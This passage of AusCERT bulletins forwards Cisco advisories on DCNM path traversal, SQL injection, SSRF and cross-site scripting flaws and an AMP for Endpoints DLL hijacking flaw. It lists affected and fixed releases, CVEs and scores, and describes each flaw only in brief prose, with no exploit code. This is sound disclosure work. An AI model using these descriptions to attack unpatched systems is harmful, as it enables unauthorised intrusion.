are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco DCNM releases
earlier than Release 11.5(1).
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco DCNM releases 11.5(1) and later contained
the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager REST API Vulnerabilities
Priority: Medium
Advisory ID: cisco-sa-dcnm-api-path-TpTApx2p
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvt82606 CSCvu28383 CSCvu28385
CVE Names: CVE-2021-1133 CVE-2021-1135 CVE-2021-1255
CWEs: CWE-184 CWE-20 CWE-807
CVSS Score:
6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X
Summary
o Multiple vulnerabilities in the REST API endpoint of Cisco Data Center
Network Manager (DCNM) could allow an authenticated, remote attacker to
view, modify, and delete data without proper authorization.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p
Affected Products
o Vulnerable Products
At the time of publication, these vulnerabilities affected Cisco DCNM
releases earlier than Release 11.4(1).
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Details
o The vulnerabilities are not dependent on one another. Exploitation of one
of the vulnerabilities is not required to exploit the other
vulnerabilities. In addition, a software release that is affected by one of
the vulnerabilities may not be affected by the other vulnerabilities.
Details about the vulnerabilities are as follows.
CVE-2021-1133: Cisco Data Center Network Manager Path Traversal
Vulnerability
A vulnerability in the REST API of Cisco Data Center Network Manager (DCNM)
could allow an authenticated, remote attacker with a low-privilege account
to conduct a path traversal attack on an affected device.
The vulnerability is due to insufficient validation of user-supplied input
to the API. An attacker could exploit this vulnerability by sending a
crafted request to the API. A successful exploit could allow the attacker
to delete arbitrary files on the file system.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvt82606
CVE-ID: CVE-2021-1133
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE-2021-1255: Cisco Data Center Network Manager Path Traversal
Vulnerability
A vulnerability in a certain REST API endpoint of Cisco Data Center Network
Manager (DCNM) could allow an authenticated, remote attacker to perform a
path traversal attack on an affected device.
The vulnerability is due to insufficient path restriction enforcement. An
attacker could exploit this vulnerability by sending crafted HTTP requests
to an affected device. A successful exploit could allow the attacker to
overwrite or list arbitrary files on the affected device.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvu28383
CVE-ID: CVE-2021-1255
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
CVE-2021-1135: Cisco DCNM Software Configuration Bypass Vulnerability
A vulnerability in a certain REST API endpoint of Cisco Data Center Network
Manager could allow an authenticated, remote attacker to bypass security
controls and modify default server configuration settings on the affected
device.
The vulnerability is due to an incorrect comparison in a denylist
implementation. An attacker could exploit this vulnerability by sending
specially crafted network traffic to the affected software. A successful
exploit could allow the attacker to modify server configuration settings on
the affected device.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvu28385
CVE-ID: CVE-2021-1135
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco DCNM releases 11.4(1) and later contained
the fix for these vulnerabilities.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager SQL Injection Vulnerabilities
Priority: High
Advisory ID: cisco-sa-dcnm-sql-inj-OAQOObP
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv82432 CSCvv82433
CVE Names: CVE-2021-1247 CVE-2021-1248
CWEs: CWE-89
Summary
o Multiple vulnerabilities in certain REST API endpoints of Cisco Data Center
Network Manager (DCNM) could allow an authenticated, remote attacker to
execute arbitrary SQL commands on an affected device.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP
Affected Products
o Vulnerable Products
These vulnerabilities affect Cisco DCNM releases earlier than Release 11.5
(1).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Details
o The vulnerabilities are not dependent on one another. Exploitation of one
of the vulnerabilities is not required to exploit the other vulnerability.
In addition, a software release that is affected by one of the
vulnerabilities may not be affected by the other vulnerability.
Details about the vulnerabilities are as follows.
CVE-2021-1247: Cisco DCNM SQL Injection Vulnerability
A vulnerability in a REST API endpoint of Cisco DCNM could allow an
authenticated, remote attacker with lower-level privileges to execute
arbitrary SQL commands on an affected device.
This vulnerability is due to insufficient validation of user-supplied input
to the API. An attacker with lower-level privileges, such as
network-operator , could exploit this vulnerability by sending a crafted
request to the API. A successful exploit could allow the attacker to view
information that they are not authorized to view, make changes to the
system that they are not authorized to make, or execute commands within the
underlying operating system that may affect the availability of the device.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv82432
CVE ID: CVE-2021-1247
Security Impact Rating (SIR): High
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE-2021-1248: Cisco DCNM SQL Injection Vulnerability
A vulnerability in a REST API endpoint of Cisco DCNM could allow an
authenticated, remote attacker with administrative privileges to execute
arbitrary SQL commands on an affected device.
This vulnerability is due to insufficient validation of user-supplied input
to the API. An attacker with administrative privileges could exploit this
vulnerability by sending a crafted request to the API. A successful exploit
could allow the attacker to view information that they are not authorized
to view, make changes to the system that they are not authorized to make,
or execute commands within the underlying operating system that may affect
the availability of the device.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv82433
CVE ID: CVE-2021-1248
Security Impact Rating (SIR): High
CVSS Base Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o Cisco has released free software updates that address the vulnerabilities
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
Cisco fixed these vulnerabilities in Cisco DCNM releases 11.5(1) and later.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager Server-Side Request Forgery Vulnerability
Priority: High
Advisory ID: cisco-sa-dcnm-ssrf-F2vX6q5p
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv82444
CVE Names: CVE-2021-1272
CWEs: CWE-918
Summary
o A vulnerability in the session validation feature of Cisco Data Center
Network Manager (DCNM) could allow an unauthenticated, remote attacker to
bypass access controls and conduct a server-side request forgery (SSRF)
attack on a targeted system.
This vulnerability is due to insufficient validation of parameters in a
specific HTTP request by an attacker. An attacker could exploit this
vulnerability by sending a crafted HTTP request to an authenticated user of
the DCNM web application. A successful exploit could allow the attacker to
bypass access controls and gain unauthorized access to the Device Manager
application, which provides access to network devices managed by the
system.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p
Affected Products
o Vulnerable Products
This vulnerability affects Cisco DCNM Software if it is running a release
earlier than 11.5(1).
This vulnerability affects DCNM-Storage Area Network (SAN) deployments ,
including the following:
Open Virtual Appliance (OVA) deployments
Windows DCNM-SAN installations
Linux DCNM-SAN installations
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
Cisco fixed this vulnerability in Cisco DCNM software releases 11.5(1) and
later.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager Vulnerabilities
Priority: Medium
Advisory ID: cisco-sa-dcnm-xss-vulns-GuUJ39gh
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvu50101 CSCvu68933 CSCvv00638 CSCvv00642 CSCvv00643
CSCvv00644 CSCvv00645 CSCvv00646 CSCvv00654 CSCvv07930
CSCvv87589 CSCvv87602 CSCvv87608 CSCvv87614
CVE Names: CVE-2021-1249 CVE-2021-1250 CVE-2021-1253 CVE-2021-1286
CWEs: CWE-20 CWE-79
Summary
o Multiple vulnerabilities in the web-based management interface of Cisco
Data Center Network Manager (DCNM) could allow a remote attacker with
network-operator privileges to conduct a cross-site scripting (XSS) attack
or a reflected file download (RFD) attack against a user of the interface.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh
Affected Products
o Vulnerable Products
At the time of publication, these vulnerabilities affected Cisco DCNM
releases earlier than Release 11.5(1).
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Details
o The vulnerabilities are not dependent on one another. Exploitation of one
of the vulnerabilities is not required to exploit the other vulnerability.
In addition, a software release that is affected by one of the
vulnerabilities may not be affected by the other vulnerability.
Details about the vulnerabilities are as follows.
CVE-2021-1249: Cisco DCNM Cross-Site Scripting Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco
DCNM could allow an authenticated, remote attacker to conduct an XSS attack
against a user of the interface.
These vulnerabilities are due to insufficient input validation by the
web-based management interface. An attacker could exploit these
vulnerabilities by inserting malicious data into a specific data field in
the interface. A successful exploit could allow the attacker to execute
arbitrary script code in the context of the affected interface or access
sensitive, browser-based information.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
Bug ID(s): CSCvv00645 , CSCvu50101 , CSCvu49711 , CSCvu68933
CVE ID: CVE-2021-1249
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
CVE-2021-1286: Cisco DCNM Reflected File Download Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco
DCNM could allow an unauthenticated, remote attacker to conduct an RFD
attack against a user of the interface of an affected device.
These vulnerabilities are due to insufficient validation of user-supplied
input by the web-based management interface. An attacker could exploit
these vulnerabilities by persuading an authenticated user of the interface
to click a link that submits malicious input to the interface. A successful
exploit could allow the attacker to execute arbitrary script code on the
affected device.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
Bug ID(s): CSCvv87608 , CSCvv87589 , CSCvv87602
CVE ID: CVE-2021-1286
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.1
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N
CVE-2021-1250: Cisco DCNM Cross-Site Scripting Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco
DCNM could allow an authenticated, remote attacker to conduct an XSS attack
against a user of the interface.
These vulnerabilities are due to insufficient input validation by the
web-based management interface. An attacker could exploit these
vulnerabilities by inserting malicious data into a specific data field in
the interface. A successful exploit could allow the attacker to execute
arbitrary script code in the context of the affected interface or access
sensitive, browser-based information.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
Bug ID(s): CSCvv00642 , CSCvv87614 , CSCvv00638 , CSCvv00644 , CSCvv00654 ,
CSCvv00643
CVE ID: CVE-2021-1250
Security Impact Rating (SIR): Medium
CVSS Base Score: 5.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
CVE-2021-1253: Cisco DCNM Persistent Cross-Site Scripting Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco
DCNM could allow an authenticated, remote attacker to conduct an XSS attack
against a user of the interface.
These vulnerabilities are due to insufficient input validation by the
web-based management interface. An attacker could exploit these
vulnerabilities by inserting malicious data into a specific data field in
the interface. A successful exploit could allow the attacker to execute
arbitrary script code in the context of the affected interface or access
sensitive, browser-based information.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
Bug ID(s): CSCvv07930 , CSCvv00646
CVE ID: CVE-2021-1253
Security Impact Rating (SIR): Medium
CVSS Base Score: 5.9
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco Data Center Network Manager releases 11.5
(1) and later contained the fix for these vulnerabilities.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkX2uNLKJtyKPYoAQhBPw//Sf6Ygf/j2PMfs3S+wzBCEt2z47IGbgsK
t5zkciYRd56y+0y+SGs3oniZTFbd19gLN4WqzYcavLcJFGzBHvPnq78G+tLnts5J
OlM4DCilgcyaVPPA3mz6doKL8ttNeVnXWVVkMSxQnJIKCuPci6Sys/fJoGBbX0NJ
ROeeqQa4CZRgeH8ecyy3tvpPapRbXC+Xuye058KQOl0Ei06zxuO9LwAVB2kYLsbw
3O2x61xOInuwcMNasPq/EkyFKvL2zQnWfUWG1qTCGLOWqtlh6bM6zvAsDIpYm6Sw
QJ+/u7Y7Qtk5mtGihIWxNEsW9KUIqHcR91Fu3n0nizTobtw25yeCeW2otdAEZcyH
bg79/wmUpnYnKX5pmJlD5i2TE8GTevVTh2dfCyd8eJH5fHDDp5kFFA0Ski+kBEoB
VuTowQdeeWu58cyEdInZJ/gDoVt6wEnsOCVpE/Gjc3QupOIV/55cHU0RQyUY1g8Z
uowsqwAanE8C1E9b8sH81v7pj2Wrz23PrypasCHBbDND9Jatqa26GstMsyZ7fthf
qz5eNgz9qvPeRQxVDEyFjl4yTAQQ8ALYjv8WIAEvD7oyi3x/Yt+cae/fjUeigfS9
1m0vmH2v7kantc29yctj9VCHFDquAvkmSznnB31W4lujIDty2/lydPmYb/AXUOJc
dXhNryjzQ54=
=QwFo
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0245
Cisco Advanced Malware Protection for Endpoints and Immunet
for Windows DLL Hijacking Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Advanced Malware Protection for Endpoints and Immunet for Windows
Publisher: Cisco Systems
Operating System: Windows
Impact/Access: Execute Arbitrary Code/Commands -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1280
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Advanced Malware Protection for Endpoints and Immunet for Windows DLL
Hijacking Vulnerability
Priority: High
Advisory ID: cisco-sa-amp-imm-dll-5PAZ3hRV
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv53346
CVE Names: CVE-2021-1280
CWEs: CWE-427
Summary
o A vulnerability in the loading mechanism of specific DLLs of Cisco Advanced
Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows
could allow an authenticated, local attacker to perform a DLL hijacking
attack. To exploit this vulnerability, the attacker would need valid
credentials on the Windows system.
This vulnerability is due to incorrect handling of directory search paths
at run time. An attacker could exploit this vulnerability by placing a
malicious DLL file on the targeted system. This file will execute when the
vulnerable application launches. A successful exploit could allow the
attacker to execute arbitrary code on the targeted system with SYSTEM
privileges.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV
Affected Products
o Vulnerable Products
This vulnerability affects the following products:
All Cisco AMP for Endpoints for Windows releases earlier than Release
7.3.3
All Immunet for Windows releases earlier than Release 7.3.12
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Cisco has confirmed that this vulnerability does not affect the following
Cisco products:
AMP for Endpoints for Linux
AMP for Endpoints for Mac
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
Cisco fixed this vulnerability in the following releases:
Cisco AMP for Endpoints for Windows releases 7.3.3 and later
Immunet for Windows releases 7.3.12 and later
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any malicious use of the vulnerability that is described in this advisory.
Source
o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for initially
reporting this vulnerability. Cisco would also like to thank Kyriakos
Economou and Tom Wilson of ZeroPeril Ltd. for their report on this
vulnerability.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
